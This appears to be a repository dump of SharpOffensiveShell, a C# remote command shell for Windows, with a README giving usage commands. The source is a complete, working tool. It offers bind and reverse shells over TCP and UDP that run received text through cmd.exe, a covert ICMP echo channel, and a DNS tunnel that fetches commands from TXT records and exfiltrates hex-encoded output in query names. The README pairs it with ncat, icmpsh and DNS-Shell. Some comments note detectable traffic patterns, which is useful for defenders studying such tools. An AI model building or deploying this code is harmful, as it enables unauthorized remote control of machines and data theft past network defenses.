├── README.md └── SharpOffensiveShell.cs /README.md: -------------------------------------------------------------------------------- 1 | # SharpOffensiveShell 2 | 3 | A sort of simple shell which supports multiple protocols. 4 | 5 | This project is just for improving my C# coding ability. The SharpOffensiveShell DNS mode uses the native Windows API instead of the nslookup command to perform DNS requests. 6 | 7 | ## QuickStart 8 | 9 | SharpOffensiveShell supports .NET Framework 2.0 10 | 11 | ``` 12 | csc SharpOffensiveShell.cs 13 | ``` 14 | 15 | ## TCP 16 | 17 | **For bind shell** 18 | 19 | ``` 20 | sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 21 | ``` 22 | 23 | ``` 24 | ncat -v 1.1.1.1 8080 25 | ``` 26 | 27 | **For reverse shell** 28 | 29 | ``` 30 | ncat -lvp 8080 31 | ``` 32 | 33 | ``` 34 | sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 35 | ``` 36 | 37 | ## UDP 38 | 39 | **For bind shell** 40 | 41 | ``` 42 | sharpoffensiveshell.exe udp listen 0.0.0.0 8080 43 | ``` 44 | 45 | ``` 46 | ncat -u -v 1.1.1.1 8080 47 | ``` 48 | 49 | **For reverse shell** 50 | 51 | ``` 52 | ncat -u -lvp 8080 53 | ``` 54 | 55 | When the reverse connection is accepted, press Enter to make the prompt display. 
56 | 57 | ``` 58 | sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 59 | ``` 60 | 61 | ## ICMP 62 | 63 | ``` 64 | git clone https://github.com/inquisb/icmpsh 65 | sysctl -w net.ipv4.icmp_echo_ignore_all=1 66 | cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP 67 | ``` 68 | 69 | ``` 70 | sharpoffensiveshell.exe icmp connect listenIP 71 | ``` 72 | 73 | ## DNS 74 | 75 | ``` 76 | pip install dnslib 77 | git clone https://github.com/sensepost/DNS-Shell 78 | ``` 79 | 80 | **For direct mode** 81 | 82 | ``` 83 | python DNS-Shell.py -l -d [Server IP] 84 | sharpoffensiveshell.exe dns direct ServerIP Domain 85 | ``` 86 | 87 | **For recursive mode** 88 | 89 | ``` 90 | DNS-Shell.py -l -r [Domain] 91 | sharpoffensiveshell.exe dns recurse Domain 92 | ``` 93 | 94 | -------------------------------------------------------------------------------- /SharpOffensiveShell.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Net; 4 | using System.Net.Sockets; 5 | using System.Net.NetworkInformation; 6 | using System.Text; 7 | //using System.Linq; 8 | using System.Runtime.InteropServices; 9 | using System.Threading; 10 | using System.Diagnostics; 11 | 12 | namespace SharpShell 13 | { 14 | class DnsClass 15 | { 16 | public enum DnsQueryOptions 17 | { 18 | DNS_QUERY_STANDARD = 0x0, 19 | DNS_QUERY_ACCEPT_TRUNCATED_RESPONSE = 0x1, 20 | DNS_QUERY_USE_TCP_ONLY = 0x2, 21 | DNS_QUERY_NO_RECURSION = 0x4, 22 | DNS_QUERY_BYPASS_CACHE = 0x8, 23 | DNS_QUERY_NO_WIRE_QUERY = 0x10, 24 | DNS_QUERY_NO_LOCAL_NAME = 0x20, 25 | DNS_QUERY_NO_HOSTS_FILE = 0x40, 26 | DNS_QUERY_NO_NETBT = 0x80, 27 | DNS_QUERY_WIRE_ONLY = 0x100, 28 | DNS_QUERY_RETURN_MESSAGE = 0x200, 29 | DNS_QUERY_MULTICAST_ONLY = 0x400, 30 | DNS_QUERY_NO_MULTICAST = 0x800, 31 | DNS_QUERY_TREAT_AS_FQDN = 0x1000, 32 | DNS_QUERY_ADDRCONFIG = 0x2000, 33 | DNS_QUERY_DUAL_ADDR = 0x4000, 34 | DNS_QUERY_MULTICAST_WAIT = 0x20000, 35 | 
DNS_QUERY_MULTICAST_VERIFY = 0x40000,
DNS_QUERY_DONT_RESET_TTL_VALUES = 0x100000,
DNS_QUERY_DISABLE_IDN_ENCODING = 0x200000,
DNS_QUERY_APPEND_MULTILABEL = 0x800000,
DNS_QUERY_RESERVED = unchecked((int)0xF0000000)
}

// Second argument of DnsRecordListFree; only DnsFreeFlat is used in this file.
public enum DNS_FREE_TYPE
{
    DnsFreeFlat = 0,
    DnsFreeRecordList = 1,
    DnsFreeParsedMessageFields = 2
}

// Only the two record types this class queries (A and TXT) are declared.
public enum DnsRecordTypes
{
    DNS_TYPE_A = 0x1,
    DNS_TYPE_TEXT = 0x10,
    DNS_TYPE_TXT = DNS_TYPE_TEXT,
}

// DnsQuery_W is bound twice with the same entry point; the two bindings differ only in how
// the pExtra argument is marshalled: IntPtr.Zero (system resolver configuration) versus a
// ref IP4_ARRAY naming the server the query is sent to.
[DllImport("dnsapi", EntryPoint = "DnsQuery_W", CharSet = CharSet.Unicode, SetLastError = true, ExactSpelling = true)]
public static extern int DnsQuery([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrName, DnsRecordTypes wType,
    DnsQueryOptions Options, IntPtr pExtra, ref IntPtr ppQueryResultsSet, IntPtr pReserved);

[DllImport("dnsapi", EntryPoint = "DnsQuery_W", CharSet = CharSet.Unicode, SetLastError = true, ExactSpelling = true)]
public static extern int DnsQueryWithServerIp([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrName, DnsRecordTypes wType,
    DnsQueryOptions Options, ref IP4_ARRAY dnsServerIpArray, ref IntPtr ppQueryResultsSet, IntPtr pReserved);

// Releases the record list returned through ppQueryResultsSet; called from the finally blocks below.
[DllImport("dnsapi", CharSet = CharSet.Auto, SetLastError = true)]
public static extern void DnsRecordListFree(IntPtr pRecordList, DNS_FREE_TYPE FreeType);

// Payload of an A record: one 32-bit IPv4 address.
[StructLayout(LayoutKind.Sequential)]
public struct DNS_A_DATA
{
    public uint IpAddress;
}

// Payload of a TXT record: a count followed by the first entry of an inline string-pointer array.
[StructLayout(LayoutKind.Sequential)]
public struct DNS_TXT_DATA
{
    public uint dwStringCount;
    public IntPtr pStringArray;
}

// Bit-field view of the record flags DWORD: Section = bits 0-1, Delete = bit 2,
// CharSet = bits 3-4, Unused = bits 5-7, Reserved = bits 8-31.
[StructLayout(LayoutKind.Sequential)]
public struct DNS_RECORD_FLAGS
{
    internal uint data;
    public uint Section
    {
        get { return data & 0x3u; }
        set { data = (data & ~0x3u) | (value & 0x3u); }
    }
    public uint Delete
    {
        get { return (data >> 2) & 0x1u; }
        set { data = (data & ~(0x1u << 2)) | (value & 0x1u) << 2; }
    }
    public uint CharSet
    {
        get { return (data >> 3) & 0x3u; }
        set { data = (data & ~(0x3u << 3)) | (value & 0x3u) << 3; }
    }
    public uint Unused
    {
        get { return (data >> 5) & 0x7u; }
        set { data = (data & ~(0x7u << 5)) | (value & 0x7u) << 5; }
    }
    public uint Reserved
    {
        get { return (data >> 8) & 0xFFFFFFu; }
        set { data = (data & ~(0xFFFFFFu << 8)) | (value & 0xFFFFFFu) << 8; }
    }
}

// The flags DWORD either as a raw value or through the bit-field view above.
[StructLayout(LayoutKind.Explicit)]
public struct FlagsUnion
{
    [FieldOffset(0)]
    public uint DW;
    [FieldOffset(0)]
    public DNS_RECORD_FLAGS S;
}

// Record payload union; only A and TXT are read in this file, the other aliases share TXT's layout.
[StructLayout(LayoutKind.Explicit)]
public struct DataUnion
{
    [FieldOffset(0)]
    public DNS_A_DATA A;
    [FieldOffset(0)]
    public DNS_TXT_DATA HINFO, Hinfo, ISDN, Isdn, TXT, Txt, X25;
}

// One node of the singly-linked list DnsQuery_W returns (pNext chains the nodes).
// NOTE(review): the offsets are hard-coded for 4-byte pointers (pName at 4, wType at 8),
// so this layout presumably only matches a 32-bit process — confirm before relying on it elsewhere.
[StructLayout(LayoutKind.Explicit)]
public struct DNS_RECORD
{
    [FieldOffset(0)]
    public IntPtr pNext;
    [FieldOffset(4)]
    public IntPtr pName;
    [FieldOffset(8)]
    public ushort wType;
    [FieldOffset(10)]
    public ushort wDataLength;
    [FieldOffset(12)]
    public FlagsUnion Flags;
    [FieldOffset(16)]
    public uint dwTtl;
    [FieldOffset(20)]
    public uint dwReserved;
    [FieldOffset(24)]
    public DataUnion Data;
}

// Server list passed to DnsQueryWithServerIp; SizeConst = 1 fixes it to exactly one address.
[StructLayout(LayoutKind.Sequential)]
public struct IP4_ARRAY
{
    public UInt32 AddrCount;
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1, ArraySubType = UnmanagedType.U4)]
    public UInt32[] AddrArray;
}

// Dotted-quad IPv4 string of the server to query directly. Empty (the default) means the
// system-configured resolver is used (see the Length == 0 branches in QueryA/QueryTXT).
public string DnsServerIp = "";

/// <summary>
/// Packs a dotted-quad IPv4 string into a long, first octet in the most significant byte.
/// </summary>
/// <param name="ip">Four dot-separated decimal octets.</param>
/// <returns>The packed value; no octet range check is performed.</returns>
/// <exception cref="FormatException">From long.Parse on a non-numeric part.</exception>
/// <exception cref="IndexOutOfRangeException">Fewer than four parts.</exception>
public static long IpToInt(string ip)
{
    char[] separator = new char[] { '.' };
    string[] items = ip.Split(separator);
    return long.Parse(items[0]) << 24
        | long.Parse(items[1]) << 16
        | long.Parse(items[2]) << 8
        | long.Parse(items[3]);
}

/// <summary>
/// Inverse of IpToInt: renders the low 32 bits of <paramref name="ipInt"/> as a dotted quad,
/// bits 24-31 first. Higher bits are ignored by the masks.
/// </summary>
public static string IntToIp(long ipInt)
{
    StringBuilder sb = new StringBuilder();
    sb.Append((ipInt >> 24) & 0xFF).Append(".");
    sb.Append((ipInt >> 16) & 0xFF).Append(".");
    sb.Append((ipInt >> 8) & 0xFF).Append(".");
    sb.Append(ipInt & 0xFF);
    return sb.ToString();
}

/// <summary>
/// Issues an A query for <paramref name="domain"/> through dnsapi with DNS_QUERY_BYPASS_CACHE,
/// so every call produces a query on the wire rather than a cached answer.
/// </summary>
/// <param name="domain">Name to resolve; passed by reference only because of the VBByRefStr marshalling.</param>
/// <returns>
/// The A-record addresses formatted by IntToIp, or null when DnsQuery_W returns a non-zero status.
/// Callers in this file (DnsExec) discard the result; the query itself is what they rely on.
/// </returns>
public List<string> QueryA(string domain)
{
    IntPtr recordsArray = IntPtr.Zero;
    try
    {
        int result = 0;
        if (DnsServerIp.Length == 0)
        {
            result = DnsQuery(ref domain, DnsRecordTypes.DNS_TYPE_A, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE,IntPtr.Zero, ref recordsArray, IntPtr.Zero);
        }
        else
        {
            // The four address bytes are copied into the DWORD as-is (no byte swap).
            uint address = BitConverter.ToUInt32(IPAddress.Parse(DnsServerIp).GetAddressBytes(), 0);
            uint[] ipArray = new uint[1];
            ipArray.SetValue(address, 0);
            IP4_ARRAY dnsServerArray = new IP4_ARRAY();
            dnsServerArray.AddrCount = 1;
            dnsServerArray.AddrArray = new uint[1];
            dnsServerArray.AddrArray[0] = address;
            result = DnsQueryWithServerIp(ref domain, DnsRecordTypes.DNS_TYPE_A, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE, ref dnsServerArray, ref recordsArray, IntPtr.Zero);
        }

        if (result != 0)
        {
            return null;
        }
        DNS_RECORD record;
        List<string> recordList = new List<string>();
        // Walk the linked list; record.pNext is valid because the body assigns record before the step.
        for (IntPtr recordPtr = recordsArray; !recordPtr.Equals(IntPtr.Zero); recordPtr = record.pNext)
        {
            record = (DNS_RECORD)Marshal.PtrToStructure(recordPtr, typeof(DNS_RECORD));
            if (record.wType == (int)DnsRecordTypes.DNS_TYPE_A)
            {
                recordList.Add(IntToIp(record.Data.A.IpAddress));
                //Console.WriteLine(IntToIp(record.Data.A.IpAddress));
            }
        }
        return recordList;

    }
    finally
    {
        // The native list is freed on every path, including the early null return.
        if (recordsArray != IntPtr.Zero)
        {
            DnsRecordListFree(recordsArray, DNS_FREE_TYPE.DnsFreeFlat);
        }
    }
}

/// <summary>
/// Issues a TXT query for <paramref name="domain"/>; same server selection and cache bypass as QueryA.
/// </summary>
/// <returns>
/// One entry per TXT record, or null on a non-zero status. Only the first string of each record
/// is read (pStringArray); dwStringCount is not consulted.
/// </returns>
public List<string> QueryTXT(string domain)
{
    IntPtr recordsArray = IntPtr.Zero;
    try
    {
        int result = 0;
        if (DnsServerIp.Length == 0)
        {
            result = DnsQuery(ref domain, DnsRecordTypes.DNS_TYPE_TXT, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE, IntPtr.Zero, ref recordsArray, IntPtr.Zero);
        }
        else
        {

            uint address = BitConverter.ToUInt32(IPAddress.Parse(DnsServerIp).GetAddressBytes(), 0);
            uint[] ipArray = new uint[1];
            ipArray.SetValue(address, 0);
            IP4_ARRAY dnsServerArray = new IP4_ARRAY();
            dnsServerArray.AddrCount = 1;
            dnsServerArray.AddrArray = new uint[1];
            dnsServerArray.AddrArray[0] = address;
            result = DnsQueryWithServerIp(ref domain, DnsRecordTypes.DNS_TYPE_TXT, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE, ref dnsServerArray, ref recordsArray, IntPtr.Zero);
        }
        if (result != 0)
        {
            return null;
        }
        DNS_RECORD record;
        List<string> recordList = new List<string>();
        for (IntPtr recordPtr = recordsArray; !recordPtr.Equals(IntPtr.Zero); recordPtr = record.pNext)
        {
            record = (DNS_RECORD)Marshal.PtrToStructure(recordPtr, typeof(DNS_RECORD));
            if (record.wType == (int)DnsRecordTypes.DNS_TYPE_TXT)
            {
                recordList.Add(Marshal.PtrToStringAuto(record.Data.TXT.pStringArray));
                //Console.WriteLine(Marshal.PtrToStringAuto(record.Data.TXT.pStringArray));
            }
        }
        return recordList;
    }
    finally
    {
        if (recordsArray != IntPtr.Zero)
        {
            DnsRecordListFree(recordsArray, DNS_FREE_TYPE.DnsFreeFlat);
        }
    }
}

}

// Entry point plus one loop per transport (TCP, UDP, ICMP echo, DNS). Every loop hands the
// received text to RunCmd unchanged and writes the output back. No transport authenticates the
// peer and nothing is encrypted: the fixed prompt, the command lines and the output all travel
// as plain UTF-8/ASCII, which is what makes this traffic recognisable on the wire.
class Program
{
    // Sent before the first read and after every result on every transport; the one constant
    // string in the protocol.
    static string Prompt = "Command>";

    /// <summary>
    /// Runs <paramref name="cmd"/> as <c>cmd.exe /C &lt;cmd&gt;</c> with no window and returns its output.
    /// Host-side, each received line shows up as a cmd.exe child of this process with a /C argument.
    /// </summary>
    /// <param name="cmd">Raw command text as received from the peer; not filtered or quoted.</param>
    /// <returns>
    /// stdout if non-empty, else stderr; "\n" for an empty command. Returns null only if Start()
    /// returns false without throwing (the method then falls through to "\n").
    /// </returns>
    public static string RunCmd(string cmd)
    {
        string outSuccess = string.Empty;
        string outFail = string.Empty;
        if (cmd.Length > 0)
        {
            Process proc = new Process();
            proc.StartInfo.FileName = "cmd.exe";
            proc.StartInfo.Arguments = "/C " + cmd;
            proc.StartInfo.UseShellExecute = false;
            proc.StartInfo.RedirectStandardInput = false;
            proc.StartInfo.RedirectStandardOutput = true;
            proc.StartInfo.RedirectStandardError = true;
            proc.StartInfo.CreateNoWindow = true;
            try
            {
                if (proc.Start())
                {
                    // Waits up to 10 s before draining the pipes; a child that fills its stdout
                    // pipe before then can stall until the timeout elapses.
                    proc.WaitForExit(10 * 1000);
                    outSuccess = proc.StandardOutput.ReadToEnd();
                    outFail = proc.StandardError.ReadToEnd();
                    if (outSuccess.Length > 0)
                    {
                        return outSuccess;
                    }
                    else
                    {
                        return outFail;
                    }

                }
            }
            catch (Exception ex)
            {
                // ex is not used. If Start() itself threw, StandardError was never attached and
                // this read presumably throws again from inside the handler.
                outFail = proc.StandardError.ReadToEnd();
                return outFail;
            }
            finally
            {
                // NOTE(review): Process.Responding is a UI-responsiveness check; for a windowless
                // cmd.exe it is expected to report true, so a still-running child is unlikely to be killed here.
                if (!proc.HasExited)
                {
                    if (!proc.Responding)
                    {
                        proc.Kill();
                    }
                }
                if (proc != null)
                {
                    proc.Close();
                    proc.Dispose();
                    proc = null;
                }
            }
        }
        return "\n";
    }

    /// <summary>
    /// TCP transport. "connect" dials <paramref name="IPAddr"/>:<paramref name="Port"/>; "listen"
    /// binds there and serves the first peer that connects — there is no check on who that is.
    /// Commands are decoded as ASCII, replies sent as UTF-8, until the peer closes (Read returns 0).
    /// </summary>
    static void TcpShell(string Action,string IPAddr,int Port)
    {
        TcpClient client = null;
        TcpListener server = null;
        if (Action == "connect")
        {
            client = new TcpClient(IPAddr, Port);
        }
        if (Action == "listen")
        {
            IPAddress localAddr = IPAddress.Parse(IPAddr);
            try
            {
                server = new TcpListener(localAddr, Port);
                server.Start();
                client = server.AcceptTcpClient();
            }
            catch (SocketException e)
            {
                Console.WriteLine("SocketException: {0}", e);
                return;
            }

        }

        // Any Action other than the two above leaves client null and faults on the next line.
        NetworkStream stream = client.GetStream();
        byte[] bytes = new Byte[65535];
        byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(Prompt);
        stream.Write(sendbytes, 0, sendbytes.Length);
        int i = stream.Read(bytes,0,bytes.Length);
        while(i != 0)
        {
            // One Read per command: whatever arrived in this segment is executed as-is.
            ASCIIEncoding EncodedText = new System.Text.ASCIIEncoding();
            string data = EncodedText.GetString(bytes, 0, i);
            string sendback = RunCmd(data);
            sendbytes = System.Text.Encoding.UTF8.GetBytes(sendback);
            stream.Write(sendbytes, 0, sendbytes.Length);
            byte[] sendbytes2 = System.Text.Encoding.UTF8.GetBytes(Prompt);
            stream.Write(sendbytes2, 0, sendbytes2.Length);
            stream.Flush();
            i = stream.Read(bytes, 0, bytes.Length);
        }
        client.Close();
        if (server != null)
            server.Stop();
    }

    /// <summary>
    /// UDP transport. Both modes bind local port <paramref name="Port"/>; "listen" additionally
    /// waits for a first datagram from anyone and then answers that sender. The loop ends on a
    /// datagram equal to "exit\n" (case-insensitive).
    /// </summary>
    static void UdpShell(string Action, string IPAddr, int Port)
    {
        UdpClient client = null;
        //UdpClient server = null;
        IPEndPoint endpoint = new IPEndPoint(IPAddress.Parse(IPAddr), Port);
        ASCIIEncoding EncodedText = new System.Text.ASCIIEncoding();
        if (Action == "connect")
        {
            // Address-family guess by string length: anything longer than 16 chars is treated as IPv6.
            if (IPAddr.Length > 16)
            {
                client = new UdpClient(Port, AddressFamily.InterNetworkV6);
            }
            else
            {
                client = new UdpClient(Port, AddressFamily.InterNetwork);
            }
        }
        if (Action == "listen")
        {
            endpoint = new IPEndPoint(IPAddress.Any, Port);
            if (IPAddr.Length > 16)
            {
                client = new UdpClient(Port, AddressFamily.InterNetworkV6);
            }
            else
            {
                client = new UdpClient(Port, AddressFamily.InterNetwork);
            }
            // The first datagram's source becomes the peer; its content is discarded.
            client.Receive(ref endpoint);
        }
        byte[] bytes = new Byte[65535];
        byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(Prompt);
        client.Send(sendbytes, sendbytes.Length, endpoint);

        while (true)
        {
            // Receive(ref endpoint) overwrites endpoint with each datagram's source.
            byte[] receivebytes = client.Receive(ref endpoint);
            string returndata = EncodedText.GetString(receivebytes);
            if (returndata.ToLower() == "exit\n")
                break;
            string sendback = RunCmd(returndata);
            sendbytes = System.Text.Encoding.UTF8.GetBytes(sendback);
            client.Send(sendbytes, sendbytes.Length, endpoint);
            byte[] sendbytes2 = System.Text.Encoding.UTF8.GetBytes(Prompt);
            client.Send(sendbytes2, sendbytes2.Length, endpoint);
        }
        client.Close();
    }

    /// <summary>
    /// ICMP echo transport. Polls <paramref name="IPAddr"/> with empty echo requests once a second;
    /// a reply carrying a payload is executed, and the output goes back in 128-byte echo-request
    /// payloads. Echo requests with non-empty, text-like payloads are the network-visible part.
    /// </summary>
    static void IcmpShell(string IPAddr)
    {
        int Delay = 1;
        int BufferSize = 128;
        Ping pingSender = new Ping();
        PingOptions options = new PingOptions();
        options.DontFragment = true;


        byte[] PromptBuffer = Encoding.UTF8.GetBytes(Prompt);
        int Timeout = 60 * 1000;
        PingReply reply = pingSender.Send(IPAddr, Timeout, PromptBuffer, options);

        while (true)
        {
            byte[] EmptyBuffer = Encoding.UTF8.GetBytes("");
            reply = pingSender.Send(IPAddr, Timeout, EmptyBuffer, options);
            if (reply.Buffer.Length > 0)
            {
                string Response = Encoding.ASCII.GetString(reply.Buffer);
                if (Response.ToLower() == "exit\n")
                    break;
                string Result = RunCmd(Response);
                byte[] ResultBuffer = Encoding.UTF8.GetBytes(Result);
                // Integer division happens before the cast, so Math.Floor is a no-op here.
                int index = (int)Math.Floor((double)(ResultBuffer.Length / BufferSize));
                int i = 0;

                if (ResultBuffer.Length > BufferSize)
                {
                    byte[] ResultBuffer2;
                    while (i < index)
                    {
                        /* only c# 3.5 can support linq */
                        //ResultBuffer2 = ResultBuffer.Skip(i * BufferSize).Take((i + 1) * BufferSize - i * BufferSize).ToArray();
                        ResultBuffer2 = new List<byte>(ResultBuffer).GetRange(i * BufferSize, (i + 1) * BufferSize - i * BufferSize).ToArray();
                        reply = pingSender.Send(IPAddr, Timeout, ResultBuffer2, options);
                        i += 1;
                    }
                    int remainIndex = ResultBuffer.Length % BufferSize;
                    if (remainIndex != 0)
                    {
                        /* only c# 3.5 can support linq */
                        //ResultBuffer2 = ResultBuffer.Skip(i * BufferSize).Take(ResultBuffer.Length - i * BufferSize).ToArray();
                        ResultBuffer2 = new List<byte>(ResultBuffer).GetRange(i * BufferSize, ResultBuffer.Length - i * BufferSize).ToArray();
                        reply = pingSender.Send(IPAddr, Timeout, ResultBuffer2, options);
                    }
                }
                else
                {
                    reply = pingSender.Send(IPAddr, Timeout, ResultBuffer, options);
                }
                reply = pingSender.Send(IPAddr, Timeout, PromptBuffer, options);
            }
            else
            {
                Thread.Sleep(Delay * 1000);
            }
        }
    }

    /// <summary>
    /// Non-cryptographic random int in [min, max) from a fresh time-seeded Random; used only to
    /// vary query names in DnsShell.
    /// </summary>
    static int RandomNumber(int min, int max)
    {
        Random random = new Random();
        return random.Next(min, max);
    }

    /// <summary>
    /// Builds <paramref name="size"/> random letters in the range 'A'..'Z' (26 * r + 65), lower-cased
    /// when <paramref name="lowerCase"/> is set. Non-cryptographic; used to make DNS labels unique.
    /// </summary>
    static string RandomString(int size, bool lowerCase)
    {
        StringBuilder builder = new StringBuilder();
        Random random = new Random();
        char ch;
        for (int i = 0; i < size; i++)
        {
            ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
            builder.Append(ch);
        }
        if (lowerCase)
            return builder.ToString().ToLower();
        return builder.ToString();
    }

    /// <summary>
    /// Runs <paramref name="cmd"/> and carries the output out as A-query names: the UTF-8 output
    /// is hex-encoded (BitConverter.ToString, dashes removed), cut into 50-character chunks, and
    /// each chunk becomes a label — <c>&lt;8 letters&gt;.CMD&lt;n&gt;.&lt;hex&gt;.&lt;domain&gt;</c> —
    /// framed by a <c>.CMDC&lt;count&gt;.</c> query before and a <c>.END.</c> query after.
    /// The A answers are ignored. Long, high-entropy labels under one domain, each sent with
    /// cache bypass, are the observable pattern; nothing here is rate-limited.
    /// </summary>
    static void DnsExec(DnsClass dnsClass,string cmd,string domain)
    {
        string result = RunCmd(cmd);
        byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(result);
        string bitString = BitConverter.ToString(sendbytes).Replace("-","");
        int bitLen = bitString.Length;
        int split = 50;
        int repeat = (int)Math.Floor((double)(bitLen/split));
        int remainder = bitLen % split;
        int repeatR = 0;
        if (remainder > 0)
            repeatR = repeat + 1;
        string rnd = RandomString(8, false) + ".CMDC" + repeatR.ToString() + "." + domain;
        dnsClass.QueryA(rnd);
        int i = 0;
        for( ; i < repeat; i++)
        {
            string subStr = bitString.Substring(i*split,split);
            rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr + "." + domain;
            dnsClass.QueryA(rnd);
        }
        if( remainder > 0)
        {
            string subStr2 = bitString.Substring(bitLen - remainder);
            i += 1;
            rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr2 + "." + domain;
            dnsClass.QueryA(rnd);
        }
        rnd = RandomString(8, false) + ".END." + domain;
        dnsClass.QueryA(rnd);
    }

    /// <summary>
    /// DNS transport. Polls TXT records at <c>&lt;4 digits&gt;&lt;8 letters&gt;.&lt;Domain&gt;</c> in a loop
    /// with no delay between queries (failed or "nocmd"/empty answers just re-poll), echoes each
    /// answer to the console, stops on an answer starting with "exit", and otherwise runs it via DnsExec.
    /// </summary>
    /// <param name="Domain">Zone whose TXT records carry the commands.</param>
    /// <param name="IPAddr">Server to query directly, or "" to go through the system resolver.</param>
    static void DnsShell(string Domain, string IPAddr)
    {
        DnsClass dnsClass = new DnsClass();
        if (IPAddr.Length > 0)
            dnsClass.DnsServerIp = IPAddr;
        while (true)
        {
            string rnd = RandomNumber(1000,9999).ToString() + RandomString(8, false) + "." + Domain;
            List<string> txtRecords = dnsClass.QueryTXT(rnd);
            if (txtRecords == null)
                continue;
            string responseCmd = String.Join(" ", txtRecords.ToArray());
            Console.WriteLine(responseCmd);
            if (responseCmd.ToLower().StartsWith("nocmd") || responseCmd.Length == 0 )
                continue;
            if (responseCmd.ToLower().StartsWith("exit"))
                break;
            DnsExec(dnsClass,responseCmd,Domain);
        }
    }


    // Prints the accepted command lines; the verbatim string is runtime output and is left untouched.
    static void Usage()
    {
        Console.Write(@"-= SharpShell by DarkRay =-
SharpShell tcp listen 0.0.0.0 8080
SharpShell tcp connect 192.168.1.1 8080
SharpShell udp listen 0.0.0.0 8080
SharpShell udp connect 192.168.1.1 8080
SharpShell icmp connect 192.168.1.1
SharpShell dns direct 192.168.1.1 test.com
SharpShell dns recurse test.com
");
    }

    /// <summary>
    /// Dispatches on args[0] (mode) and args[1] (action). Only args.Length == 0 is guarded:
    /// a single argument reaches args[1] and throws IndexOutOfRangeException instead of printing
    /// usage, and a non-numeric port makes Convert.ToInt32 throw FormatException.
    /// </summary>
    static void Main(string[] args)
    {
        if (args.Length == 0)
        {
            Usage();
            return;
        }
        string action = args[1].ToLower() ;
        if (action != "connect" && action != "listen" && action != "direct" && action != "recurse")
        {
            Usage();
            return;
        }
        string ip = "";
        int port = 0;
        string mode = args[0].ToLower();
        switch (mode)
        {
            case "tcp":
                ip = args[2];
                port = Convert.ToInt32(args[3]);
                TcpShell(action, ip, port);
                break;
            case "udp":
                ip = args[2];
                port = Convert.ToInt32(args[3]);
                UdpShell(action, ip, port);
                break;
            case "icmp":
                if (args.Length == 3)
                {
                    ip = args[2];
                    IcmpShell(ip);
                }
                break;
            case "dns":
                string domain = "";
                if (action == "direct")
                {
                    ip = args[2];
                    domain = args[3];
                    DnsShell(domain, ip);
                }
                if (action == "recurse")
                {
                    domain = args[2];
                    DnsShell(domain, "");
                }
                break;
            default:
                Usage();
                break;
        }
    }
}
}